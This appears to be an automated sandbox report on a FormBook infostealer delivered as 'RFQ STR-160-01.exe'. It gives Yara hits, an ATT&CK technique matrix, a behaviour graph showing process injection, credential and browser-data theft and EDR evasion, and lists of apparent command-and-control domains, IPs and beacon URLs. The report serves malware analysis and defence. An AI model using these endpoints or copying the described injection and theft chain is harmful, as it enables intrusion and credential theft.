            Source: RFQ STR-160-01.exeBinary or memory string: WIN_81
            Source: RFQ STR-160-01.exeBinary or memory string: WIN_XP
            Source: RFQ STR-160-01.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: RFQ STR-160-01.exeBinary or memory string: WIN_XPe
            Source: RFQ STR-160-01.exeBinary or memory string: WIN_VISTA
            Source: RFQ STR-160-01.exeBinary or memory string: WIN_7
            Source: RFQ STR-160-01.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.3990076785.0000000003060000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4003574545.0000000007920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490399894.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3995129739.0000000004D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490106320.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3994994966.0000000003430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490739625.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3995137235.0000000004360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_00611204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00611204
            Source: C:\Users\user\Desktop\RFQ STR-160-01.exeCode function: 0_2_00611806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00611806
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            1
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            5
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            5
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS116
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            5
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets241
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials12
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1502761 Sample: RFQ STR-160-01.exe Startdate: 02/09/2024 Architecture: WINDOWS Score: 100 31 www.jaxo.xyz 2->31 33 www.weep.site 2->33 35 12 other IPs or domains 2->35 39 Malicious sample detected (through community Yara rule) 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 Yara detected FormBook 2->43 47 6 other signatures 2->47 10 RFQ STR-160-01.exe 4 2->10         started        signatures3 45 Performs DNS queries to domains with low reputation 31->45 process4 signatures5 57 Binary is likely a compiled AutoIt script file 10->57 59 Writes to foreign memory regions 10->59 61 Maps a DLL or memory area into another process 10->61 13 svchost.exe 10->13         started        process6 signatures7 63 Maps a DLL or memory area into another process 13->63 16 MVaAnXtfZfwmI.exe 13->16 injected process8 dnsIp9 25 www.jaxo.xyz 66.29.149.180, 49741, 49742, 49743 ADVANTAGECOMUS United States 16->25 27 www.xforum.tech 103.224.182.242, 49745, 49746, 49748 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 16->27 29 8 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 rasdial.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            RFQ STR-160-01.exe32%ReversingLabsWin32.Trojan.Strab
            RFQ STR-160-01.exe30%VirustotalBrowse
            RFQ STR-160-01.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            www.ayypromo.shop0%VirustotalBrowse
            fontanerourgente.net0%VirustotalBrowse
            www.jaxo.xyz1%VirustotalBrowse
            weep.site2%VirustotalBrowse
            32wxd.top1%VirustotalBrowse
            www.cannulafactory.top1%VirustotalBrowse
            www.xforum.tech1%VirustotalBrowse
            www.onlytradez.club2%VirustotalBrowse
            www.anaidittrich.com0%VirustotalBrowse
            www.88nn.pro0%VirustotalBrowse
            www.32wxd.top1%VirustotalBrowse
            www.weep.site1%VirustotalBrowse
            www.taapbit.online2%VirustotalBrowse
            www.fontanerourgente.net0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://api.w.org/0%URL Reputationsafe
            http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.10%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://mgmasistencia.com/acerca-de/0%Avira URL Cloudsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.40%Avira URL Cloudsafe
            http://www.anaidittrich.com/qpwk/0%Avira URL Cloudsafe
            https://mgmasistencia.com/0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://tilda.cc0%Avira URL Cloudsafe
            http://www.cannulafactory.top/l90v/0%Avira URL Cloudsafe
            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.10%VirustotalBrowse
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.40%Avira URL Cloudsafe
            https://twitter.com/wordpress0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.40%VirustotalBrowse
            https://mgmasistencia.com/acerca-de/0%VirustotalBrowse
            https://tilda.cc1%VirustotalBrowse
            http://www.cannulafactory.top/l90v/1%VirustotalBrowse
            https://mgmasistencia.com/blog/0%Avira URL Cloudsafe
            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=0%VirustotalBrowse
            http://www.cannulafactory.top/l90v/?cLqL3H=65tz+8+CHtIdUwlI5J0Rvcw20Xa7qh/y7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlPhO14vaNX6GX5zyvmtdMAZdMTyJ7S8cUtjW2YAh8fb9spiiUzBk=&rZwP=sHyxifGPIFN0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.40%VirustotalBrowse
            http://www.ayypromo.shop/rgqx/0%Avira URL Cloudsafe
            https://es.wordpress.org/0%Avira URL Cloudsafe
            https://twitter.com/wordpress0%VirustotalBrowse
            https://mgmasistencia.com/blog/0%VirustotalBrowse
            http://www.xforum.tech/647x/0%Avira URL Cloudsafe
            http://www.onlytradez.club/zctj/?cLqL3H=tSuw7IYRRjv+wnLRJKBizfUbw5DKe+pV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEhfsOfW9Q7idqDaQ0/bUKrb6lVOs08wJGK3g6GM4oAhkBtSiykhk4=&rZwP=sHyxifGPIFN0%Avira URL Cloudsafe
            https://mgmasistencia.com/2021/08/30/hola-mundo/0%Avira URL Cloudsafe
            https://mgmasistencia.com/0%VirustotalBrowse
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.40%Avira URL Cloudsafe
            http://nginx.net/0%Avira URL Cloudsafe
            http://www.fontanerourgente.net/t3gh/?cLqL3H=d/YHbjU0lRTRkwDy0zIPv6PdUN2QowQER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthetgJD5Cj99fT73mV1toZHsOXJ+4nrRaepQcEbq6LCfz7oYbWletg=&rZwP=sHyxifGPIFN0%Avira URL Cloudsafe
            http://www.xforum.tech/647x/2%VirustotalBrowse
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.40%VirustotalBrowse
            http://www.xforum.tech/647x/?rZwP=sHyxifGPIFN&cLqL3H=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652oxbgTObGuSO3B10Kw=0%Avira URL Cloudsafe
            http://www.onlytradez.club/zctj/0%Avira URL Cloudsafe
            https://mgmasistencia.com/2021/08/30/hola-mundo/0%VirustotalBrowse
            http://nginx.net/0%VirustotalBrowse
            http://www.32wxd.top/kyiu/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.40%Avira URL Cloudsafe
            https://mgmasistencia.com/comments/feed/0%Avira URL Cloudsafe
            http://www.anaidittrich.com0%Avira URL Cloudsafe
            http://www.onlytradez.club/zctj/2%VirustotalBrowse
            https://mgmasistencia.com/wp-json/0%Avira URL Cloudsafe
            http://www.32wxd.top/kyiu/1%VirustotalBrowse
            http://www.88nn.pro/l4rw/0%Avira URL Cloudsafe
            https://es.wordpress.org/0%VirustotalBrowse
            http://www.anaidittrich.com0%VirustotalBrowse
            http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg0%Avira URL Cloudsafe
            http://www.88nn.pro/l4rw/?cLqL3H=ZXNQqBP58JXIf3ltP6wut8CCjedJLF5l9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj4J8VLwdTZn5p64yovrdSdmFXVLBYTbU+6U99coUT9vxRPQh+Kno=&rZwP=sHyxifGPIFN0%Avira URL Cloudsafe
            http://www.32wxd.top/kyiu/?rZwP=sHyxifGPIFN&cLqL3H=XDGtsL25HTw6JP64VC7y2QrABH1070ZVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszHLGx0l4jqt7JLz8z3pwCpHaPnAKrE0wOd8iQCO012svuMCQv9qI=0%Avira URL Cloudsafe
            https://mgmasistencia.com/contacto/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.40%VirustotalBrowse
            http://www.jaxo.xyz/f9bc/0%Avira URL Cloudsafe
            https://mgmasistencia.com/feed/0%Avira URL Cloudsafe
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.40%Avira URL Cloudsafe
            https://mgmasistencia.com/comments/feed/0%VirustotalBrowse
            http://www.redhat.com/docs/manuals/enterprise/0%Avira URL Cloudsafe
            http://www.xforum.tech/647x/?rZwP=sHyxifGPIFN&cLqL3H=FnaXBox540%Avira URL Cloudsafe
            https://wordpress.org/0%Avira URL Cloudsafe
            http://www.fontanerourgente.net/t3gh/0%Avira URL Cloudsafe
            https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-10%Avira URL Cloudsafe
            https://mgmasistencia.com/xmlrpc.php?rsd0%Avira URL Cloudsafe
            http://www.redhat.com/0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.ayypromo.shop
            176.57.64.102
            truefalseunknown
            fontanerourgente.net
            37.187.158.211
            truefalseunknown
            www.jaxo.xyz
            66.29.149.180
            truetrueunknown
            weep.site
            194.233.65.154
            truefalseunknown
            32wxd.top
            206.119.82.116
            truefalseunknown
            www.cannulafactory.top
            18.183.3.45
            truefalseunknown
            www.anaidittrich.com
            162.55.254.209
            truefalseunknown
            www.onlytradez.club
            167.172.133.32
            truefalseunknown
            www.88nn.pro
            45.157.69.194
            truefalseunknown
            www.xforum.tech
            103.224.182.242
            truefalseunknown
            www.weep.site
            unknown
            unknowntrueunknown
            www.taapbit.online
            unknown
            unknowntrueunknown
            www.fontanerourgente.net
            unknown
            unknowntrueunknown
            www.32wxd.top
            unknown
            unknowntrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://www.anaidittrich.com/qpwk/false
            • Avira URL Cloud: safe
            unknown
            http://www.cannulafactory.top/l90v/false
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.cannulafactory.top/l90v/?cLqL3H=65tz+8+CHtIdUwlI5J0Rvcw20Xa7qh/y7kK7USWOBh85j9WcKbCPI7UII3emD6Kks24YSbVOAcNXIRb+3rSlPhO14vaNX6GX5zyvmtdMAZdMTyJ7S8cUtjW2YAh8fb9spiiUzBk=&rZwP=sHyxifGPIFNfalse
            • Avira URL Cloud: safe
            unknown
            http://www.ayypromo.shop/rgqx/false
            • Avira URL Cloud: safe
            unknown
            http://www.xforum.tech/647x/false
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.onlytradez.club/zctj/?cLqL3H=tSuw7IYRRjv+wnLRJKBizfUbw5DKe+pV3SuosHDPhpHVIQ9U3bF8KrgVZ9eofhuzjMlHgMWokK5nneJg1eEhfsOfW9Q7idqDaQ0/bUKrb6lVOs08wJGK3g6GM4oAhkBtSiykhk4=&rZwP=sHyxifGPIFNfalse
            • Avira URL Cloud: safe
            unknown
            http://www.fontanerourgente.net/t3gh/?cLqL3H=d/YHbjU0lRTRkwDy0zIPv6PdUN2QowQER5WtK+J3r0U/ADUIPiMSea/+ySZyWjMipb/6l9jjBkeXWJl7BthetgJD5Cj99fT73mV1toZHsOXJ+4nrRaepQcEbq6LCfz7oYbWletg=&rZwP=sHyxifGPIFNfalse
            • Avira URL Cloud: safe
            unknown
            http://www.xforum.tech/647x/?rZwP=sHyxifGPIFN&cLqL3H=FnaXBox54+ag7g5huWPEmVuBH/Jm8y343eRchhJyHcxj2nBsvZZTTofBDuDrTRxDwJS/xlxq28wFbCJ7okUpgzDZpO2xsWAnZCQe5aiqUqIaOEJzM3y652oxbgTObGuSO3B10Kw=false
            • Avira URL Cloud: safe
            unknown
            http://www.onlytradez.club/zctj/false
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.32wxd.top/kyiu/false
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.88nn.pro/l4rw/false
            • Avira URL Cloud: safe
            unknown
            http://www.88nn.pro/l4rw/?cLqL3H=ZXNQqBP58JXIf3ltP6wut8CCjedJLF5l9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj4J8VLwdTZn5p64yovrdSdmFXVLBYTbU+6U99coUT9vxRPQh+Kno=&rZwP=sHyxifGPIFNfalse
            • Avira URL Cloud: safe
            unknown
            http://www.32wxd.top/kyiu/?rZwP=sHyxifGPIFN&cLqL3H=XDGtsL25HTw6JP64VC7y2QrABH1070ZVn4NdqHGWC1gt1eOjH+BVmk6PIm5PWw2c27Ak8m93WqRL2MBomZszHLGx0l4jqt7JLz8z3pwCpHaPnAKrE0wOd8iQCO012svuMCQv9qI=false
            • Avira URL Cloud: safe
            unknown
            http://www.jaxo.xyz/f9bc/false
            • Avira URL Cloud: safe
            unknown
            http://www.fontanerourgente.net/t3gh/false
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://duckduckgo.com/chrome_newtabrasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://duckduckgo.com/ac/?q=rasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            https://mgmasistencia.com/acerca-de/MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://mgmasistencia.com/rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://tilda.ccMVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.00000000066F6000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.00000000067E6000.00000004.10000000.00040000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=rasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.00000000058D4000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.00000000059C4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2773015874.000000000EFE4000.00000004.80000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://twitter.com/wordpressMVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://mgmasistencia.com/blog/MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://es.wordpress.org/MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://mgmasistencia.com/2021/08/30/hola-mundo/MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://nginx.net/MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.00000000063D2000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.00000000064C2000.00000004.10000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://mgmasistencia.com/comments/feed/MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.anaidittrich.comMVaAnXtfZfwmI.exe, 00000006.00000002.4003574545.000000000799C000.00000040.80000000.00040000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://mgmasistencia.com/wp-json/rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpgMVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://mgmasistencia.com/contacto/MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://api.w.org/rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=rasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://mgmasistencia.com/feed/MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://www.ecosia.org/newtab/rasdial.exe, 00000007.00000002.3998426651.00000000081BE000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.0000000005BF8000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.0000000005CE8000.00000004.10000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.redhat.com/docs/manuals/enterprise/MVaAnXtfZfwmI.exe, 00000006.00000002.4001977134.00000000063D2000.00000004.80000000.00040000.00000000.sdmp, rasdial.exe, 00000007.00000002.3996789330.00000000064C2000.00000004.10000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.xforum.tech/647x/?rZwP=sHyxifGPIFN&cLqL3H=FnaXBox54rasdial.exe, 00000007.00000002.3996789330.0000000006330000.00000004.10000000.00040000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
